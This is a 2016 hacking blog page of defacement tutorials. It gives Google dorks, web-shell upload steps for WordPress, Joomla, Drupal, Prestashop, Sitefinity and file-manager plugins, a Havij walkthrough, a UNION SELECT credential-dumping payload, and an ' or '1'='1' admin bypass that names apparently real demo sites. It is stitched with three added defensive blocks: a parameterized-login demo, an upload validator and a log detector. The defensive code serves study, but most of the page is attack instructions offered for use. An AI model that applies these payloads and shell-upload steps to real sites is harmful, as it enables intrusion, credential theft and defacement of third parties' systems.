Sunday, August 28, 2016

how to deface Foxy Engineering Manager + shell upload exploit

Today I will post a tutorial on how to deface Foxy Engineering Manager + shell upload exploit.

Dork: intitle: "Roxy File Manager"

tutor: Dorking Using Google.com or bing.com

select target, and it will be like http://www.target.sa.nge/themes/
backend/js/fileman/


Now Select 'Add File' and Upload your Shell..

NOTE: Shell Must be 'xxxjpg' extension, example: dabshell.php.xxx.jpg

After your Shell has been uploaded,
Then Click Right Shell => click
Preview


Thats all itz easy mhhhhhhn, Good bye for now...

HOW TO HACK USING HAVIJ


what is havij ??

Havij is a web hacking tool that is used to hack SQLi-vulnerable sites, and you can download it from below

DOWNLOAD IT HERE

download and install havij

go to google and search google dorks


Open any URL and at the end of the URL type ' and then press Enter; if you get a SQL error, that means the site is vulnerable to SQLi attack.


open havij and paste url and click on analyze


it will start searching...

if it show this box then thats it


click on tables button and then click on column like admin and user or login to get info


then if it show username and password click on those column and press get data button. then it shows username and password, thats all...

Sunday, August 21, 2016

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload exploit

Hello fans, here i come with new exploit named "Warehouse - Responsive
Prestashop 1.6 Arbitrary File
Upload"

Dork :
Inurl:/modules/columnadverts/

Inurl:/modules/homepageadvertise/

Inurl:/modules/productpageadverts/

Inurl:/modules/simpleslideshow/

Exploit
http://site.com/modules/columnadverts /uploadimage.php

http://localhost/ modules/homepageadvertise/uploadimage.php

http://site.com/modules/productpageadverts/uploadimage.php

http://site.com/modules/simpleslideshow /uploadimage.php


CSRF :


After shell uploading


Then check your uploaded shell like

http://www.site.com/modules/modules name/slides/Shellname.php

Happy hacking...

Tuesday, August 16, 2016

[PHP] Admin Finder script

[PHP] Admin Finder




Admin finder script it helps in finding admin page with no stress..


DOWNLOAD THE SCRIPT HERE

Friday, August 12, 2016

ADMIN PAGE BYPASS EXPLOIT

|[+] Exploit Title: Admin Page Bypass |[+]

|[+] Exploit Author : #By.SaMiR |[+]

|[+] Google Dork:intext:Developed By :
SAM Softech
|[+]

|[+] Google Dork:"Developed By : SAM
Softech" |[+]

|[+] Tested on: Windows 7 , Mozilla
Firefox , ubuntu
|[+]

|[+] Date: 08/08/2016
|[+]

|--------------------------------------------------------------|

|[+] Exploit :
|[+]

|[+] Username: ' or '1'='1' -- ' ~ ' or '1'='1'

|[+] Password: ' or '1'='1' -- ' ~ ' or '1'='1'
|[+]

|[+] Admin Url :-
|[+]

|[+] http://Site.com/myadmin/index.php |[+]

|--------------------------------------------------------------|

|[+] Demo:-
|[+]

|[+]http://hotelorangeinnpatna.com/myadmin

|[+]http://www.indianacupressure.com/myadmin
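Why the quoted `' or '1'='1'` input gets past a login form, and what stops it, shown as an added example that is not part of the original post: a login query built by string concatenation next to one that uses a bound parameter and a salted hash check. The table, column names and sample password are assumptions made for the demonstration.

```python
import hashlib
import hmac
import os
import sqlite3

def _kdf(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db() -> sqlite3.Connection:
    """Constructed sample table: a legacy plaintext column and a salted hash."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", "s3cret-sample", salt, _kdf("s3cret-sample", salt)))
    return db

def login_vulnerable(db, username: str, password: str) -> bool:
    # Input is pasted into the SQL text, so a quote in it ends the string
    # literal and the rest of the input is parsed as SQL.
    sql = ("SELECT 1 FROM admins WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username: str, password: str) -> bool:
    # Bound parameter: the input is only ever a value, never SQL text.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    salt, stored = row
    # The password is checked in application code against a salted hash.
    return hmac.compare_digest(_kdf(password, salt), stored)

def demo() -> dict:
    db = make_db()
    tautology = "' or '1'='1"      # string quoted in the post above
    return {
        "vulnerable, tautology": login_vulnerable(db, tautology, tautology),
        "hardened, tautology": login_hardened(db, tautology, tautology),
        "hardened, real password": login_hardened(db, "admin", "s3cret-sample"),
        "hardened, wrong password": login_hardened(db, "admin", "guess"),
    }

if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
```
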

HIGH SCHOOL DEFACE EXPLOIT

hello fellas, Lets rock High school Deface exploit is so simple i love the exploit like die...

oya lets move on

Dork: intext:Welcome to our electronic class
yearbook

exploit:
/forum_topic_create.php?forumid=1

fill out the form and upload your .txt deface..

After you've uploaded your file successfully it will appear on the next page, just click your file name and it'll redirect you to your deface link..

here are some vuln webs



Have some fun with the webs, good bye :D

Thursday, August 11, 2016

HOW TO HACK USING DRUPAL EXPLOIT TUTORIAL

Hello guyz...
This time I will explain how to deface a site that uses the Drupal 7.x ..

Prepare the ingredients: 1. Drupal Exploiter DOWNLOAD HERE 2. with your Shell uploader DOWNLOAD HERE..

Steps ------------------- 1. Save tools exploit the above with php extension and save it in your hosting or localhost or upload it in shell...


1. Google dork; intext: "powered by drupal" or inurl: "node / add/article"

2. Enter the target and press the "suck it!" (if successful in appearance like this below)


3. Go to the url http://site.com/user/login

And enter user: fuckyou pass: admin


4. Then go to http://site.com/node/add/ article (insert source of his backdoor and change its format to PHP Code)


then scroll down and click Save


And you will immediately direct to your shell.


thats allhappy hacking :D

ANDROID KALI LINUX INSTALLATION

Install Kali Linux tutorials on
Android..


Android Kali Linux installation
is quite easy and simple, keep calm and watch the above video..

click here and watch it

Exploit Sitefinity CMS Editor Dialogs File Upload Vulnerability

Exploit Tutorial deface with Sitefinity CMS (ASP.NET) Shell Upload Vulnerability..Sitefinity CMS is a bug that exist in CMS WordPress theme..

here we go


dork: inurl:"/Sitefinity/login.aspx


exploit: /sitefinity/UserControls/ Dialogs/DocumentEditorDialog.aspx

Vulnerability ~ Appears in Upload Form like this image

Then upload your shell or your deface page..

If successful uploaded the file name will
appear


Now your Shell/File Access >will be like this www.target.com/Files/file.aspx or www.target.com/Files/file.html e.t.c..


Thats all, happy hacking....

Monday, August 8, 2016

Joomla Brute Force Tutorial

Joomla Brute
Force deface Tutorial..


Dork inurl:"/ templates/beez5/" and
intitle: Index of/administrator /


Download bruteforce tool
HERE

ok Furthermore, if already find any
more targets can be saved in the file listsite.txt and password should be save @listpassword.txt



now open the bruteforce software, then
click Load From File. If so, click Scan



Then stay waiting for the results, it
requires a longer period of time..


After it loads successfully you'll get vuln sites with their username and pass, like the picture below..



now just find admin panel and login...thats All..


Stay_bless and good bye 4 now...

Joomla Component com_jwallpapers Arbitrary File Upload

Hello guys... I am going to share the Joomla com_jwallpapers Component
Arbitrary File Upload vulnerability exploit..


Google Dork: inurl:/index.php? option=com_jwallpapers


select one of the web,then enter this exploit: /index.php? option=com_jwallpapers&task=upload

If it vuln u'll see something like ~ { "jsonrpc": "2.0",
"result": null, "id": "en"}



CSRF Xploit Code:


click here and copy

NB: Change parts shell_kalian.php with the name of the shell that you want it (ex:
shell.php), and also shell that you
upload must be -.jpg extension (ex:
shell.jpg). Without having to use tamper
data and so on..


Shell Access:
http://target.com/ jwallpapers_files/plupload/shell_kalian.php


Stil remember that, the shell must be a .jpg extension, and later change the name of your shell e.g kalian.php, like that Kalian wrote on CSRF, extension also be .php....

Saturday, August 6, 2016

LOKOMEDIA SQL TUTORIAL

Okay, this time i'm going to share Lokomedia SQL tutorial,
This tutorial is very easy, follow the steps below silently...


dorks:


- Inurl: static-1-pengantar.html

- Inurl: category-23-hiburan.html


- Inurl: things-about-kami.html

- Inurl: static-3-visidanmisi.html


- Inurl: Static-19-beasiswa.html


- Inurl: Static-22-kerjasama.html


Exploit: 'union select / *! 50000Concat
* / (username, 0x20, password) from +
users + - + - +


=================HOW TO USE IT
=====================

Find the target site first, as example, I
use DORK
- static-1-pengantar.html
then search
on GOOGLE , there will be a lot of SITES..
then select any site, Example http:/site.com/statis-1-pengantar.html


then enter this explot /statis--1'union select /*!
50000Concat*/
(username,0x20,password)+from+users-- +--+-pengantar.html

example : http://
site.com/statis--1'union select /*!
50000Concat*/
(username,0x20,password)+from+users-- +--+-pengantar.html

There must be no spaces, or the exploit will
miss, and add (-)
before the figures on its site URL
It will bring out the web username and
password in a new page..

If its use HASH Password, Decrypt the
password in

hashkiller

If the password is found now look for admin login admin login in

-http://site.com/admin

-http://site.com/adminweb

-http://site.com/administrator

-Http://site.com/redaktur


If you successfully login, upload your shell
in photo gallery, or banner if it failed
to upload
favico on the web, Rename your shell to shell.php.JPG
(Adds .jpg format) and then on Tamper Data, can be downloaded in add ons to
the browser
you use..

Then get the shell access by clicking the
right mouse button, then copy and paste
the link address his error photo you
uploaded earlier, to a new url, and Done....

Read about shell uploading using tamper data here

admin default user

Hello everybody. Now I will discuss " Tutorial to deface Admin Default User "I Use This technique Frequently, It Very Easy...
Without wasting of our time lets move straight to the point.
- Dork: inurl:/html/index.php? News site: sch.id
if you need more sitez add this domainz to your dork jg,go.id, ac.id, co.id, id, com, lots more..
Find The target, for example: www.site.com/html/index.php? id=berita
Change it to www.site.com/ admin/
Afterwards enter the UserName and Password, the username and password is= admin
If the web is vuln it will redirect you to the admin dashboard... Now do whatever you feel like doing with the web, or you can upload your shell using Tamper Data....

Wednesday, August 3, 2016

WORDPRESS THEMES U-DESIGN EXPLOIT

Hello World; this time I'll Share u-design themes exploit in wordpress.

#Type: CSRF & Xampp, Uploadify

#Tested: Windows XP, 7, 8, BackBox

#CMS: WordPress


Dork: inurl:themes/u-design/


exploit:
/wp-content/themes/u-design/scripts/admin/uploadify/
uploadify.php



If Vuln, it will display a "blank" page


CSRF





Shell Access: site.com/myshell.php


Thats all for now, stay updated always..

WordPress deface Fluid_forms Upload Vulnerability Exploit

Hello Fans,
our today's article will be on WordPress Fluid_forms Upload Vulnerability
Exploit..

#Type: CSRF & Xampp, Uploadify

#Tested: Windows XP, 7, 8, BackBox

#CMS: WordPress


NOW LET MOVE ON

Dork: inurl:fluid_forms or inurl:"/wp-content/plugins/fluid_forms/file-upload/"


Exploit: /wp-content/plugins/fluid_forms/ file upload/server/php/



search the dork in Google, Select a target, then enter Exploit.
example:
site.com/wp-content/plugins/fluid_forms /fileupload/server/php/

If Vuln, it will display "files []"


CSRF





Replace www.site.com with your
target web, then Save the csrf script as: .html E.G md.html and upload your shell.


Shell Access: /wp-content/plugins/
fluid_forms/file-upload/server/php/
files/shellname.php


thats all, if you dont understand contact me or comment bellow...

HOW TO DEFACE WORDPRESS THEMES QUALIFIRE..

Hi All
, now i will post Wp Qualfire Themes hacking tutorial..


-Dork: inurl:"wp-content/themes/
qualifire


-Exploit : /wp-content/themes/qualifire/
scripts/admin/uploadify/uploadify.php



If it shows blank page that means it Vuln

CSRF





If the shell uploads successfully it will display "1" in a blank page


how to Access your shell: target.com/shellname.php


NOTE: not all webz accept .php file,so if php fails during uploading try jpg,phtml,txt or html


Good_Bye :D

JQUERY SHELL UPLOADING TUTORIAL

salam guyz, here is another wordpress shell uploading tutorial.. "jQuery shell upload vulnerability"
Google Dork: Dork : /assets/global/plugins/jquery-file-upload/ inurl:"assets/global/plugins/jquery-file- upload/"
Vulnerability : http://target.com/assets/global/plugins/jquery-file-upload/server/php/
When Vulnerable : it will show something like "files" in a blank page..
Copy it CSRF code here
Check your uploaded shell here
Shell Access : target.com/assets/global/ plugins/jquery-file-upload/server/php/ files/shellname.php
Happy defacing....

TAMPER DATA SHELL UPLOADING TUTORIAL

Shell uploading is a hell-like thing for
beginners, so here I am writing this tutorial
for beginners to upload a shell through the
Tamper Data add-on of Mozilla Firefox.


When to Use Tamper Data:


Some websites don't allow uploading files other than images, so in such a situation shell uploading is a problem because we can't upload any php or asp shell file. So we can upload a shell by tampering with HTTP headers.


Requirements:

Mozilla Firefox

Tamper Data add-on


Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Mozilla FireFox: http://www.mozilla.org/en-US/firefox/new/


1. Open Website's Admin Panel...

2. Change Your Shell Extension to .jpeg or .jpg or .gif

3. Now open your Tamper Data And Click on Start Tampering..

4. Now go to the Upload option and upload your Shell As shell.jpg

5. Windows Will Pop-UP. --- Tamper - Submit - Abort REQUEST Click on Tamper At Your Right Side Copy All Text from POST DATA BOX Paste All text in notepad..

6. Now Press CTRL + F, a search
Text field will appear in your firefox browser's lower left..

7. Search For Shell.jpg

8. Edit You Shell Extension to .php then copy it paste it on post data box And Click On Submit...

9. Congrats, your shell has been uploaded successfully.

10. Now in image gallery where you have uploaded shell, u will see many images.Right click on your shell image and click on "copy image location". Now paste this url in your browser bar.Your shell will open up for you.

Why do we need TamperData:


Tamper Data is used to view / modify HTTP/HTTPS headers and POST parameters. So with this add-on we will trick the web application into thinking that we are uploading an image file, i.e. jpg, gif, png etc., but while the file is being transferred through HTTP headers we will change its extension to shell.php and our shell will be uploaded. This is called HTTP header tampering..
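The server-side check that makes the renaming described above (and the `.php.xxx.jpg` and `.PhP.txt` names used in other posts on this page) ineffective, as an added example that is not part of the original post: the stored name is chosen by the server from the file's content, and the client-supplied name is never used on disk. The function names and the extension list are assumptions.

```python
import secrets

# Leading bytes of the only content types this handler stores.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}
# Extensions a web server may hand to an interpreter (assumed list; extend
# it to match the handlers configured on your server).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "jsp", "cgi"}

def script_parts(client_name: str) -> list:
    """Script extensions found in ANY dot-separated part of the name,
    case-insensitively, so 'x.php.xxx.jpg' and 'x.PhP.txt' are both flagged."""
    parts = client_name.lower().split(".")[1:]
    return [p for p in parts if p in SCRIPT_EXTS]

def stored_name_for(client_name: str, data: bytes) -> str:
    """Return the server-chosen file name, or raise ValueError.

    client_name is whatever arrived in the request, i.e. possibly rewritten
    in transit after any browser-side check. It is inspected only to decide
    on rejection; no part of it is used to build the stored name."""
    ext = next((e for magic, e in SIGNATURES.items() if data.startswith(magic)), None)
    if ext is None:
        raise ValueError(f"rejected {client_name!r}: content is not PNG, JPEG or GIF")
    if script_parts(client_name):
        raise ValueError(f"rejected {client_name!r}: script extension in name")
    # Random name plus an extension derived from the content. Store the file
    # in a directory where the web server never invokes an interpreter,
    # because a valid image header can still be followed by script text.
    return secrets.token_hex(16) + ext
```
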

WordPress Smallbiz Themes Remote File Uploads Vulnerability

#- Title: Wordpress Smallbiz Themes
Remote File Uploads Vulnerability

#- Author: FullSecurity.org

#- Date: 09-02-2016

#- Developer : expand2web.com

#- Link Download : www.expand2web.com/smallbiz-
theme/


Google Dork: inurl:"/themes/
smallbiz/"


Vulnerability : site/wp-content/themes/smallbiz/palette/index.php


When Vulnerable :



Method :

1. Go to site.com/wp-content/themes/
smallbiz/palette/index.php

2. Upload your image

3. If successful, click the image & open it in a new
tab.. that's all..

Tutorial deface By Com_Smartformer

Salam guys, i wanna share :
" Com_Smartformer deface tutorial"


the exploit is so simple and easy to understand


Now let's get down to business


Dork: inurl:index,php?Option=
com_smartformer"


Start opening the webs, you'll be redirected to the registration page, fill out the form correctly.




when filling the form you'll see an upload option, upload your shell there.


after registration, find your uploaded shell here.


www.site.com/components/
com_smartformer/files/yourshellname.php


thats all for now, stay updated for another exploit...

Tuesday, August 2, 2016

Com_media shell uploading tutorial

Hello fans, how you doing ?? I hope you'r satisfied with the tutors i do posted ??



0k i come with another private shell uploading method, is not too hard you can use even china phones to destroy webs with the exploit.



However, when I said that I upload shells using the com_media exploit, a lot of people said I'm lying or joking, and I basically proved them
wrong.



A lot of people think maybe I used Tamper Data to upload it or I got a priv8 hacking software that I am using, loolz..



Huh i'm tired of typing lemme go straight to the point.



first of all rename your shell to this extention: shellname.PhP.txt



-Get a vuln web



-upload your shell



-run your uploaded shell, it'll be like

www.site.com/images/shellname.PhP.txt wait and see the magic!!!


NOTE: not all webz maybe vuln to shell uploading, but be trying them one by one...


Read my first post on com_media here....click here

Monday, August 1, 2016

WORDPRESS FORMCRAFT EXPLOIT

This time I will share WordPress Plugins FormCraft deface tutorial, Follow my steps gradually dont rush..
Requirements:
- Shell
- CSRF script

Save the script in HTML extension! example: csrf.html
STEPS
1. Go to www.google.com and paste this dork:
inurl:/wp-content/plugins/formcraft
2. Then select any web
3. And enter the following exploits:
/wp-content/plugins/formcraft/file- upload/server/php/upload.php
E.g site.com/wp-content/plugins/formcraft/file- upload/server/php/upload.php
4. If vuln to our attack, you will see something like this: ( "failed": "No files found") or files []
On a white blank page
5. The next step is to open CSRF script
6. Copy and paste vuln site in CSRF
7. Save it, and then open a shell server and Upload the CRSF script you edited earlier.
8. then run your uploaded script E.G www.site.com/crsf.html
9. A new white blank page will open, upload your own shell there.
10. If the shell uploads successfully, it will appear with a random simple text name: 19860ab123abcd--blabla.php
Lastly Access your shell at http:// www.site.com/wp-content/plugins/ formcraft/fileupload/server/php/files/nameshellrandom.php
wp-content/plugins/ formcraft / sile upload/server/php/ file/ 154897dc834ecb---blabla.php
thats all, i hope you understand the tutor ?? If no you are free to contact the admin.... Good bye!!
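Several posts on this page share one request pattern: a POST to a plugin's upload handler, followed by a GET for a script file inside that plugin's upload directory. A detector for that sequence over web access logs, as an added example that is not part of the original posts; the handler and directory patterns are taken from the paths quoted above, and the log lines are constructed.

```python
import re

# Combined log format: client IP, method, request target, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
# Upload handlers named in the posts above.
HANDLER = re.compile(
    r"/(uploadify\.php|uploadimage\.php"
    r"|(file-?upload|jquery-file-upload)/server/php/(upload\.php)?)$", re.I)
# A script extension anywhere in a file name served from an upload directory.
DROPPED = re.compile(r"/(files|slides|plupload)/[^/]+\.(php\d?|phtml|aspx?)(\.\w+)*$", re.I)

def upload_then_execute(lines):
    """Return (ip, handler_path, script_path) for every client that POSTed
    to an upload handler and later fetched a script from an upload directory."""
    posted = {}      # ip -> path of its most recent successful handler POST
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                      # not an access-log line
        ip, method, target, status = m.groups()
        path = target.split("?", 1)[0]    # match on the path, not the query
        if not status.startswith("2"):
            continue
        if method == "POST" and HANDLER.search(path):
            posted[ip] = path
        elif method == "GET" and ip in posted and DROPPED.search(path):
            findings.append((ip, posted[ip], path))
    return findings

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2016:10:00:01 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 200 28',
    '198.51.100.4 - - [01/Aug/2016:10:00:05 +0000] "GET /wp-content/uploads/2016/08/team.jpg HTTP/1.1" 200 48211',
    '203.0.113.7 - - [01/Aug/2016:10:02:13 +0000] "POST /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 200 311',
    '203.0.113.7 - - [01/Aug/2016:10:02:40 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/files/19860ab123abcd--blabla.php HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Aug/2016:10:03:00 +0000] "GET /wp-content/plugins/formcraft/file-upload/server/php/files/form-attachment.pdf HTTP/1.1" 200 90211',
]

if __name__ == "__main__":
    for ip, handler, script in upload_then_execute(SAMPLE_LOG):
        print(f"ALERT {ip}: POST {handler} then GET {script}")
```

The correlation is per client IP, so it misses an upload and a fetch made from different addresses; denying script execution in upload directories at the web server covers that case.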